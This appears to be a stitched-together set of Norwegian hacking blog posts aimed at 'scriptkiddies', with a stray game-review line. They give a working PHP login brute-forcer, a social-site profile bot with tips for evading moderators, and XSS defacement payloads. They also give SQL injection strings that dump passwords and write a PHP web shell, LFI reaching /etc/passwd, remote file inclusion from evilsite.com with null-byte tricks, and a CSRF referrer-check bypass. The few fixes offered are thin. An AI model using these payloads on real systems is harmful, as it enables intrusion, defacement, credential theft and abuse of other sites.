Det fins en rekke metoder som hackere bruker for å knekke en web applikasjon. Ofte fins det feil i php koden til et nettsted, som gjør det mulig å hente ut passord/brukernavn. Andre ganger fins det feil i selve http serveren. Apache som er en av de mest brukte web serverne, hadde mange feil i tidligere versjoner.

Men den metoden som er aller mest utbredt, er bruteforcing. Det vil si at man prøver å gjette seg fram til riktig passord. Dette tar forferdelig lang tid å gjøre manuelt, men et dataprogram kan gjøre dette kjappt.

Fremgangsmåten for å hacke et passord er følgende:

1. Få tak i et gyldig brukernavn( f.eks. admin)
2. Gjett et passord
3. Sjekk om passordet var riktig, hvis ikke riktig, gå til 2.
4. Passord funnet eller hele ordlisten er ferdig gjennomløpt.

Tidsforsinkelser
Å prøve ett passord kan ta relativt lang tid. La oss si det tar 1 sekund å sjekke et passord. Da kan du sjekke 3600 passord på en time. Jeg vet ikke hvor mange ord det er i norsk, men oppimot 100 000 forskjellige ord?

Da vil de ta 27,7 timer å sjekke alle ordene i ordboken. Ikke bare lager dette et helvetes bråk i loggfilene, men det er ikke sikkert passordet fins i en ordbok.

Mange bruker nemlig passord som hestefot666, museknappvenstre og andeball osv. Hvis passordet inneholder tall, eller store og små bokstaver, blir det helt umulig(mange uker) å bruteforce et passord på lengre enn 3 tegn.

Så bruteforcing av passord på web applikasjoner funker egentlig bare når vedkommende har brukt et ord som fins i ordboken.

Hvordan gjøres det?
I de fleste programmeringsspråk kan man skrive kode som logger inn på et nettsted. Deretter kan koden sjekke respons html koden, om innloggingen var vellykket.

Her er et eksempel på et php script som bruteforcer en login:

<?php

/* Bruteforcer login. Må ha ordliste. */

$user = "admin";
$file = "wordlist.txt";

function crack($user, $pass)
{
	$url = "http://localhost/pentest/phplogin.php";
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url );
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS,"user=$user&pass=$pass");

	$data = curl_exec($ch);

	if(!eregi("failure", $data))
	{
		echo "\n\n MATCH $pass \n\n";
	}
	else
	{
		echo "#";
	}
}

$words = file($file);

$i = 0;
while($words[$i])
{
	crack($user, trim($words[$i]));
	$i++;
}
?>

LES OGSÅ: Hvordan hacke en gjestebok

Her har jeg laget et php login script, der riktig brukernavn er “admin”, og riktig passord er “login”. Dersom riktig kombinasjon er skrevet inn, printes “success” ut. Så når scriptet får en html response som inneholder “success” vet den at passordet var riktig. Og “failure” dersom det var feil.

Her er sjekken:

if(!eregi("failure", $data))
{
	echo "\n\n MATCH $pass \n\n";
}

Og passordet printes ut.

Det som står inni her:

curl_setopt($ch, CURLOPT_POSTFIELDS,"user=$user&pass=$pass");

Må matche POST variablene. Så hvis html formen ser slik ut:

<input type="text" name="usr">
<input type="text" name="pw">

Så må koden se slik ut:

curl_setopt($ch, CURLOPT_POSTFIELDS,"usr=$user&pw=$pass");

Router passord knekking?
Jeg prøvde å bruteforce passordet på routeren min. Dette gikk overraskende kjappt. Programmet klarte å sjekke 30 passord i sekundet.

Så hvis du har mistet passordet til routeren og ikke har lyst til å restarte den, prøv å bruteforce passordet.

Til neste innlegg skal jeg lage en video der jeg viser hvordan jeg brutforca meg fram til passordet. Har du problemer med å legge inn php, eller å få koden til å kjøre? Sjekk ut ofte stilte spørsmål i denne teksten: Studweb karaktervarsler

vg

Er du lei av å logge inn på studentweb hver dag og sjekke etter nye karakterer? La heller et program gjøre jobben for deg. Dette php scriptet logger inn og sjekker etter nye karakterer hvert 30. minutt, og varsler deg på sms når du har fått en ny karakter.

Den sms’en du får er generert av inpoc.no, og kommer til å si at din kode for innlogging er “xxxx”, men glem det, poenget er at du blir varslet per sms.

For å kunne kjøre koden må php være installert. Last f.eks. ned wamp. Bla deg fram til mappen der filen med kode ligger, og skriv “php studweb.php”.

Ofte stillte spørsmål
1. Jeg får opp php gjenkjennes ikke som en intern eller ekstern kommando,
kjørbart program eller satsvis fil.” når jeg prøver å kjøre koden.”

SVAR: Php må være installert, i tillegg må du sette en PATH. D.v.s. at cmd kan nå php.exe fra hvorsom helst i cmd. Høyreklikk min datamaskin -> Avanserte systeminnstillinger -> Miljøvariabler -> Ny -> Variabelnavn skal være “Path” og variabelverdi skal være plassering av php.exe. Til meg er den “C:\wamp\bin\php\php5.3.0″.

2. Når jeg kjører koden får jeg “PHP Fatal error: Call to undefined function curl_init(). SVAR: Åpne php.ini som ligger i samme mappe som php.exe. Søk deg fram til linjen som inneholder “extension=php_curl.dll”. Fjern det semikolonet som er forran.

Last ned koden fra .txt eller kopier herfra:

<?php

## Logger innpå studweb og sjekker for nye karakterer.
## Det brukes her personnummer og pin.

// Config
$nr = "xx"; // personnummer
$pin = "xxxx";
$cell = "xx"; // tlf nummer
$fag = array("exph0001", "ma1103"); // fagkoder. Kun småebokstaver!

$cookie = "c.txt";

function login()
{
	global $cookie;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "https://studentweb.ntnu.no/cgi-bin/WebObjects/studentweb2?inst=NTNU");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);

	$data = curl_exec($ch);
	curl_close($ch);

	// Finner token som trengs til innlogging

	preg_match_all("/(\d){8}/", $data, $match);
	$token = $match[0][0];

	$fp = fopen("a.html", "w");
	fwrite($fp, $data);
	fclose($fp);

	login2($token);
}

function login2($token)
{
	global $cookie;
	global $nr;
	global $pin;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "https://studentweb.ntnu.no/cgi-bin/WebObjects/studentweb2.woa/wa/login");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);

	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, "fodselsnr={$nr}&pinkode={$pin}&transnr={$token}&login=Logg%20inn&javascript=0&inst=NTNU");

	$data = curl_exec($ch);
	curl_close($ch);

	// Finner url som trengs til å klikke på _Innsyn_

	preg_match_all("/ater m\.m\.\" href=\"(.+?)\"/", $data, $match);
	$url = $match[1][0];

	$fp = fopen("b.html", "w");
	fwrite($fp, $data);
	fclose($fp);

	login3($url);
}

function login3($url)
{
	global $cookie;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "https://studentweb.ntnu.no" . $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);

	$data = curl_exec($ch);
	curl_close($ch);

	// Finner token som trengs til å klikke på _Resultater_

	preg_match_all("/Se dine resultater\" href=\"(.+?)\"/", $data, $match);
	$url = $match[1][0];

	$fp = fopen("c.html", "w");
	fwrite($fp, $data);
	fclose($fp);

	login4($url);
}

function login4($url)
{
	global $cookie;
	global $fag;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "https://studentweb.ntnu.no" . $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);

	$data = strtolower(curl_exec($ch));
	curl_close($ch);

	// looper igjennom og ser etter fagkodene

	$i = 0;
	while($fag[$i])
	{
		if( strpos($data, $fag[$i]) )
		{
			echo "\nVarsler.. $fag[$i] \n";

			unset($fag[$i]); // fjerner faget fra array
			varsle();
		}
		else
		{
			echo "#";
		}

		$i++;
	}

	$fp = fopen("d.html", "w");
	fwrite($fp, $data);
	fclose($fp);

}

function varsle()
{
	global $cell;

	// sender en sms til mobil

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, 'http://folk.inpoc.no/registrer/');
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS,"cellnumber={$cell}&x=36&y=5&_aspiro_service=Login&_aspiro_service_method=registerSystemUser&_aspiro_service_onsuccess=step2.ftl&_aspiro_service_onsuccess_forward_parameter=cellnumber");
	$data = curl_exec($ch);

	curl_close($ch);
}

while(1)
{
	login();

	sleep(1800); // 30 mins
}

?>

Den måten spillet forteller historien, samtidig som du spiller, er fantastisk. Ble nesten litt på gråten….

Prøv det selv:

Det er 1. desember, og årets 2. julegave til alle scriptkiddie der ute er nå kommet.

Nettbycrawler, besøksscript eller nettbybot er alle begrep som handler om å automatisere en oppgave. Nærmere bestemt det å besøke mange tusen profiler i løpet av minutter. Det du oppnår ved dette er flere venner, flere brev og mer “status”.

På nettby er alle profiler nummerert med et nummer slik:

http://www.nettby.no/user/index.php?user_id=1

http://www.nettby.no/user/index.php?user_id=2

http://www.nettby.no/user/index.php?user_id=3

Dermed blir det en enkel sak å besøke mange profiler, man bare øker tallet bakerst. Følgende er en php kode som må kjøres med php. Via en http server(apache) eller via kommandolinjen.

<?php

$u = "brukernavn";
$p = "passord";

$cookie = "kaker.txt";

function login($u, $p)
{
	global $cookie;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://www.nettby.no/sb_login.php" );
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS,"email={$u}&password={$p}&submit=Logg inn");
	$data = curl_exec($ch);
}

function visit($i)
{
	global $cookie;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://www.nettby.no/user/index.php?user_id={$i}" );
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
	$data = curl_exec($ch);

	echo "Besøkte profil \n";
}

login($u, $p); // Logger inn

$i = 1;  // Starter på profil nummer 1

while($i < 100000) // Hundretusen profiler
{
	visit($i);
	$i++;
}

?>

Kopier koden og lim inn i en notepad, lagre den som "nettby.php".

For å kjøre koden må selvfølgelig brukernavn og passord endres. Og php må være installert på din pc. For å laste ned php klikk her. Der følger det også med en http server, men det har ikke noe å si.

Når du har installert wamp, ligger php på pc'n din. Åpne et dos shell ved å trykk "windows-knappen" + R. Skriv deretter "cmd".

Deretter blar du deg inn til der php.exe ligger. Du blar i mapper ved å bruke "cd mappeNavn". Og skriver "php nettby.php".

UPDATE:Åpne php.ini som ligger i php5.3.0 mappen, søk deg fram til linjen som inneholder "extension=php_curl.dll", fjern semikolonet forran, lagre.

For å unngå at du blir utestengt må du chillen med antall besøk. Jeg tror det er maks 15 profilbesøk per minutt som får deg merket med et rødt flagg, og du blir sjekka opp av moderatorene. Så prøv å sett inn en sleep(6) slik:

while($i < 100000) // Hundretusen profiler
{
	visit($i);
	$i++;

	sleep(6); //   <--- sover i 6 sekunder
}

Her vil det besøkes 6 profiler i minuttet. 8600 profiler på 24 timer. Noe som synes å være menneskelig

/joke

Jeg tenker dette vil være snacks for mange der ute. Denne koden kan også brukes på andre nettsteder naturligvis. Det er bare å bytte ut noen variabler.

Noen som trenger et besøksscript for et annet nettsted? Skriv kommentar.

Her er julens første julegave til alle scriptkiddies der ute. Nå skal du få vite hvordan du “hacker” en gjestebok. Det er nemlig ikke så vanskelig.

Denne metoden er også kjent som “defacing”, d.v.s. at man fjerner hele siden, og putter inn sin egen kode. For å hacke en gjestebok trenger du kun å skrive inn javascript/html/css i feltene der du skriver inn navn, kommentar osv.

Dersom det ikke er noen filtrering eller sjekk for uønskede tegn i gjestebok scriptet, er det mulig å hacke gjesteboken.

For å se om det er mulig å hacke en gjestebok, skriv inn dette i alle feltene:

<script>alert(8)</script>

Dersom det popper opp en javascript alert boks, så er gjesteboken sårbar. For å gjøre en mer subtil sjekk, prøv dette:

 <b>sexy</b> 

Dersom du ser ordet "sexy" er bold, d.v.s. slik: sexy, så er gjesteboken sårbar.

Jeg har laget en egen gjestebok slik at du kan teste det ut selv.
Gå til gjesteboken her

Hvordan erstatte hele siden med en tekst
For at det skal se ut som om gjesteboken er hacket, kan css kode skrives inn. Eksempel nedenfor:

<style>#elem{z-index: 1;position: absolute;top: 0;left: 0;width:100%;height:100%;
background-color: black;color: red;}</style><div id=elem><p align=center>
<b>hacked!!.<br></b></p></div>

Skriv inn koden i gjesteboka, og se hva som skjer.

Dette var årets første julegave til alle kidsa der ute. Vil du ha flere julegaver?

Denne teksten vil være om en nyttig mysql funksjon for hackere. Vi skal se på FILE privilegiumet, og hvordan dette kan brukes til å hacke nettsider.

Ikke bruk informasjonen i teksten til å angripe nettsteder du ikke eier. Bruk det på dine egne, eller last ned f.eks. WAMP og prøv ut dette lokalt på din egen pc.

into outfile er en mysql funksjon som lar deg skrive filer på serveren. Eks:

SELECT * FROM members INTO OUTFILE 'test.txt'

Når denne koden kjøres blir det opprettet en fil “test.txt”, og resultatet av spørringen legges inn i denne.

For å kunne bruke out file må gjeldende bruker ha FILE privilegiumet. For å finne ut det, gjør følgende:

1. Først finn ut hva brukernavnet er

' UNION ALL SELECT USER()-- 

Dette vil gi oss username@server, vi er kun interessert i username. La oss si brukernavn var “root”.

For å se om root har FILE privilegiumet kan du aksessere information_schema.user_privileges. information_schema er en database som ofte brukeren har tilgang til. Og i denne har vi en tabell “user_privileges” som inneholder alle privilegier til alle brukere. Denne information_schema databasen ble introdusert i mysql 5.

La oss se om brukeren root har FILE privilegiumet:

' UNION ALL SELECT privilege_type FROM information_schema.user_privileges WHERE
grantee LIKE '%root%'-- 

Dersom resultatet er FILE, har brukeren root FILE privilegiumet. Eller ihvertfall alle brukere som har “root” i brukernavnet. ( vi satser på at faktisk er brukeren “root”).

Hvis du finner ut at brukeren ikke har FILE privilegiumet, kan du ikke bruke into outfile.

2. Mappe/path problemet
Om du ikke spesifiserer hvor du vil legge filen, vil denne legge seg i database mappen. På min pc vil filene derfor legge seg her: “C:\wamp\bin\mysql\mysql5.0.51b\data\test_database\”.

Så hvis jeg injiserer denne spørringen:

SELECT navn FROM medlemmer INTO OUTFILE 'test.txt'-- 

Vil denne filen bli opprettet: “C:\wamp\bin\mysql\mysql5.0.51b\data\test_database\test.txt”. Og ha innholdet fra spørringen i seg.

Å finne riktig sti/path kan ofte gjøres bare ved å injekte en enkel apostrof slik:

http://localhost/index.php?id=' 

Så vil man få en feilmelding: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp\www\index.php on line 12

Og der har man stien til www området. C:\wamp\www. Vet man denne kan man pakke data i en fil med into outfile, for så å lese innholdet ved å browse nettleseren til den riktige stien.

På mysql 5 kan du finne stien slik:

' UNION ALL SELECT @@datadir-- 

Den defaulte mappen der filer blir lagret er datadir\databasename. Du kan finne ut databasenavn slik:

' UNION ALL SELECT database()-- 

Så når du har funnet ut riktig sti/path kan du skrive til www området slik:

' UNION ALL SELECT brukernavn, passord FROM medlemmer INTO OUTFILE 'C:/wamp/www/dbdump.txt'-- 

Legg merke til at bakoverslashene må snus andre veien. Har ikke peiling på hvorfor. Deretter er det bare å surfe til http://localhost/dbdump.txt for å se på innholdet.

Det som er farlig med dette, er ikke at man kan hent ut passord og hva som helst, fordi dette kan man gjøre med vanlig sql injection. Det som er skummelt er at man kan skrive filer til serveren med hvilket innhold man vil.

Ta f.eks.

' UNION ALL SELECT '<?php system($_GET['cmd']; ?>' into outfile 'C:/wamp/www/shell.php'-- 

Dette fører til at vedkommende kan kjøre php koder på serveren din.

Local file inclusion er en annen metode php applikasjoner kan hackes med. Det er en av de mest utbredte sårbarhetene som fins på internett.

Rundt om på internett ser man lenker sånn som det her:

http://yay.com/index.php?side=kontakt.php

Det som skjer her, er en inkludering. Veldig ofte har man en mappe på nettstedet som heter f.eks. “includes”. Inni den mappen pakker man masse filer:
kontakt.php
om.php
login.php
info.php

Det som da skjer, når brukeren går til:

index.php?page=login.php

Er at login.php blir inkludert i php. Det er en slags klipp og lim sak i php, så slipper man å endre designet på alle filer, hver gang man skal oppdatere designet. Eller endre på struktur/lenker og slikt.

All php kode som ligger i login.php, blir derfor lagt inn i index.php.

Her er et eksempel på et inkluderingsscript:

$page = $_GET['page'];
include("includes/$page");

Som du ser her, legges “includes” til i starten. Dette medfører at bare filer som ligger på nettstedet kan inkluderes. Dette er forskjellen på local file inclusion. og remote file inclusion.

LES OGSÅ: Php hacking: Remote file inclusion

Ta inkluderingsscriptet ovenfor. La oss si en ondsinne hacker navigerer til denne lenken:

http://yay.com/index.php?page=../robots.txt

../ betyr “gå en mappe opp”. Scriptet går derfra vekk fra includes mappen, opp et hakk og includerer robots.txt.

Om du ikke vet hva robots.txt gjør, så er det en fil som forteller søkemotorroboter hvilke mapper og filer som ikke skal indekseres i deres søkemotor.

Dersom det er snakk om en linux server her, har du sikkert hørt om filen /etc/passwd. Det er en fil som inneholder kontoinformasjonen til alle brukerne på serveren. Den inneholder ikke passord, men ting som brukernavn, id, hvilket type shell de har osv.

La oss si den ondsinnede brukeren navigerer til denne lenken:

http://yay.com/index.php?page=../../../../../../../etc/passwd

Da vil /etc/passwd filen bli inkludert, og en local file inclusion har blitt gjort. Angriperen har fått tilgang til noe han ikke skal ha.

Kan dette føre kode injeksjon?
Ja. Dersom angriperen får lastet opp kode på serveren, vil kode kunne bli kjørt. Om f.eks. nettstedet tillater opplastning av bilder, kan et bilde inneholde php kode. Og da er det bare å inkludere bildet, og hackeren kan kjøre hvilken som helst php kode han vil.

En annen måte er å legge inn php kode i en loggfil på systemet, for deretter å inkludere loggfilen.

Løsningen
Løsningen er å ikke tillate forover slash i $_GET['page'].

Eksempel på hvordan dette kan gjøres:

if (!eregi("^((.*)/)", $filename)) {
// inkluder trygt her
}

Er ditt nettsted sårbart?

Remote file inclusion er en av mange måter en php applikasjon kan hackes med. Og er en sårbarhet man ofte finner på nettsteder som er noen år gamle, og bruker gamle scripts.

I php har man en par funksjoner der man kan inkludere filer. De fungerer som klipp og lim, slik at man ikke trenger å skrive inn hele koden hver gang. Det er bare å inkludere filen.

Dette kan gjøres med 4 funksjoner:

require()
require_once()
include()
include_once()

Her er det aller verste eksemplet på kode som er sårbar:

$pagina=$_GET['pagina'];
 include $pagina;

Hvis man da f.eks. går til følgende lenke:

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Vil php koden som er i evilscript.txt, bli inkludert og kjørt. Og får man kjørt php kode på en server, kan man gjøre nesten hva man vil.

Nullbyte trikset: %00
Noen script legger til en filendelse som .txt eller .inc.php. Da kan man bruke nullbyte( %00) til å terminere strengen, slik at det som legges til av php scriptet etterpå, blir fjernet.

Ta f.eks. et slikt script:

$pagina=$_GET['pagina'];
 include $pagina . ".inc.php";

Her legges det til “.inc.php”. Men denne blir man kvitt ved å besøke følgende lenke:

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

Forklaring på hvorfor nullbyte fungerer:

The “poison null byte” exploit takes advantage of how strings with a known length can contain null bytes and what happens when that string is converted for use with an API that uses null terminated strings. The end result is that by carefully placing a null byte in the string, the attacker is able to force the string to end at that point, even after the application has appended more characters to the string, like for example, a filename extension.

En annen måte å omgå filendelsen som legges til, er å besøke følgende lenke:

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?

Her sørger spørsmålstegnet for at alt etter det, blir behandlet som GET verdier. Dermed blir filendelsen borte vekke.

Løsningen
Filtrer vekk foroverslash /. Dermed kan kun filer i nåværende mappe inkluderes.

Eksempel script:

if (!eregi("^((.*)/)", $filename)) {
// inkluder trygt her
}

Ja nå har det skjedd igjen. Enda et sikkerhetshull i wordpress “has gone public”.

Jeg skjønner det faen ikke altså. Nå har de holdt på i mange år, og forbedret koden, og fjernet mange gamle tidligere sårbarheter. Også kommer dette her.

Den siste versjonen av Wordpress 2.8.4 er trygg. Bruker du en eldre versjon?

Gå og oppgrader nå

Det er to måter å se om din Wordpress installasjon er blitt hacket:

1.
Du ser noen merkelige permalenker som ser slik ut:

/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%

2.
Det har blitt lagt til en ny skjult administrator, som du ikke kan se:

Ryktene sier at det er massevis av programmer og web crawlers som søker rundt om på nettet etter gamle versjoner av Wordpress. Og at angrepet går dypt inn i databasen og gjemmer kode overalt.

Metoden som brukes for å hacke gamle Wordpress versjoner heter for sql injection.

LES OGSÅ: En intro til SQL injection

Jeg har heldigvis ikke blitt utsatt for dette.

Har du?

En referrer er en http header som nettleseren din sender med, på alle nettsider du besøker. Hvis jeg er inne på www.metronet.no, og klikker på en link som går til www.teknologia.no, ja da vil referreren din se slik ut:

http://www.metronet.no/blogg/2009/09/redirects-hvordan-flytte-nettsidene-dine

Jeg har tidligere skrevet om emnet, og hvorfor man ikke kan stole på referreren. Men nå skal jeg vise nøyaktig hvordan hackere klarer å omgå en referrer sperre.

Først litt om hvordan nettleseren sender avgårde din referrer.

Når jeg er inne på deewoo.org og klikker på lenken som går videre til arpa.no, sender nettleseren følgende:

GET /blog/ HTTP/1.1
Host: arpa.no
User-Agent: Mozilla/5.0
Referer: http://www.deewoo.org/?p=1047

Noen headere er tatt bort. Denne referreren kan leses inn med php:

$ref = $_SERVER['HTTP_REFERER'];
$string = "arpa.no";

if($ref) {
	if(strstr($refr,$string)) {

	}
	else {
		die("Hacking forsøk!");
	}
}

Her sjekkes det først om referrer eksisterer, for å ikke blokke ut de som har blank referrer. Deretter sjekkes det om domenet, fins i referreren. Hvis den ikke gjør det, drepes scriptet, og angrepet blir stoppet.

Et eksempel på et vanlig angrep
La oss si du er innlogget som admin på savio.no. Og idet du surfer på nettet, blir din nettleser utsatt for følgende kode:

<img src="http://www.savio.no/login/slettBruker.php?id=1">

Dette er hypotetisk.

Det som da vil skje er at din nettleser sender en forespørsel til savio.no, med beskjed om at bruker nummer 1 skal slettes. Dersom den som besøker koden, samtidig faktisk er innlogget som admin, vil admin brukeren bli slettet.

LES OGSÅ: Hva er egentlig XSS?

Grunnen til at dette skjer, er fordi nettleseren ikke kan vite at forespørselen kommer fra angriperen sitt domene, og ikke savio.no. Dermed sender den samtidig med alle cookies, som admin har forbundet med savio.no. Altså innloggingskakene.

Dersom savio har en slik referrer check jeg skrev lenger oppe, vil angrepet mislykkes.

Så hvordan omgår hackere slike sperrer?
Slike referrer checks kan omgåes med følgende kode:

<iframe width="1" height="1" src="javascript:document.write=%22<img src='

http://www.savio.no/admin/slettBruker?id=1'%22"></iframe>

Med å bruke inline javascript inni en iframe, blir referrern blank. Og dermed er referrer checken omgått.

Nettopp dette er grunnen til at mange sier at referrer checks er ubrukelige.

Løsningen?
Ved å bruke engangs tokens, kan slike csrf( cross site request forgery) angrep bli stoppet.